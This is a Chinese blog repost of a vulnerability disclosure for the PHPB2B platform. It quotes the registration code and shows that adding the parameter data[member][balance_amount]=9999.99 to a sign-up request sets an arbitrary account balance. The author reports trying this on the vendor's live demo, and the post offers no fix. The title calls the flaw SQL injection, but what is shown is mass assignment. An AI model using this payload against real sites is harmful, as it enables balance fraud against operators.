PHPB2B 最新版sql注射无限充值(官网demo成功) –

时间: 2020-10-11|tag: 26次围观|0 条评论

rt

详细说明:

看到注册用户处

if(isset($_POST['register'])){
$is_company = false;
$if_need_check = false;
$register_type = trim($_POST['register']);
$register_typename = trim($_POST['typename']);
pb_submit_check('data');
$default_membergroupid_res = $pdb->GetRow("SELECT * FROM {$tb_prefix}membertypes WHERE name='".$register_typename."'");
$default_membergroupid = $default_membergroupid_res['default_membergroup_id'];
if(empty($default_membergroupid)) $default_membergroupid = $membergroup->field("id","is_default=1");
if ($default_membergroupid_res['id']>1) {
$is_company = true;
}
$member->setParams();
$memberfield->setParams();
$member->params['data']['member']['membergroup_id'] = $default_membergroupid;
$time_limits = $pdb->GetOne("SELECT default_live_time FROM {$tb_prefix}membergroups WHERE id={$default_membergroupid}");
$member->params['data']['member']['service_start_date'] = $time_stamp;
$member->params['data']['member']['service_end_date'] = $membergroup->getServiceEndtime($time_limits);
$member->params['data']['member']['membertype_id'] = ($is_company)?2:1;
if($member_reg_auth=="1" || $member_reg_auth!=0 || !empty($G['setting']['new_userauth'])){
$member->params['data']['member']['status'] = 0;
$if_need_check = true;
}else{
$member->params['data']['member']['status'] = 1;
}
$updated = false;
$updated = $member->Add();

跟进add

function Add()
{
global $_PB_CACHE, $memberfield, $phpb2b_auth_key, $if_need_check;
$error_msg = array();
if (empty($this->params['data']['member']['username']) or 
empty($this->params['data']['member']['userpass']) or 
empty($this->params['data']['member']['email'])) return false;
$space_name = $this->params['data']['member']['username'];
$userpass = $this->params['data']['member']['userpass'];
$this->params['data']['member']['userpass'] = $this->authPasswd($this->params['data']['member']['userpass']);
if(empty($this->params['data']['member']['space_name']))
$this->params['data']['member']['space_name'] = PbController::toAlphabets($space_name);//Todo:
$uip = pb_ip2long(pb_getenv('REMOTE_ADDR'));
if(empty($uip)){
pheader("location:".URL."redirect.php?message=".urlencode(L('sys_error')));
}
$this->params['data']['member']['last_login'] = $this->params['data']['member']['created'] = $this->params['data']['member']['modified'] = $this->timestamp;
$this->params['data']['member']['last_ip'] = pb_get_client_ip('str');
$email_exists = $this->checkUserExistsByEmail($this->params['data']['member']['email']);
if ($email_exists) {
flash("email_exists", null, 0);
}
$if_exists = $this->checkUserExist($this->params['data']['member']['username']);
if ($if_exists) {
flash('member_has_exists', null, 0);
}else{
$this->save($this->params['data']['member']);

save 函数把我们的post数据 做了foreach 

function save($obj_name, $obj_id, $data)
{
if (empty($data)) {
return false;
}
foreach ($data as $key=>$val) {
if (in_array($key, array('title', 'keyword', 'description'))) {
$this->add($obj_id, $obj_name, $key, $val);
}

官网测试下

我们注册用户时。抓包,添加参数

data%5Bmember%5D%5Bbalance_amount%5D=9999.99

PHPB2B 最新版sql注射无限充值(官网demo成功) –插图

成功充值。。

PHPB2B 最新版sql注射无限充值(官网demo成功) –插图1

漏洞证明:

PHPB2B 最新版sql注射无限充值(官网demo成功) –插图1

修复方案:

你们更加专业

    上一篇: 校无忧系统默认配置getshell - 网站安全 - 自学ph

    下一篇: B2Bbuilder设计缺陷导致整站重装 - 网站安全 - 自学
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《PHPB2B 最新版sql注射无限充值(官网demo成功) –
   

还没有人抢沙发呢~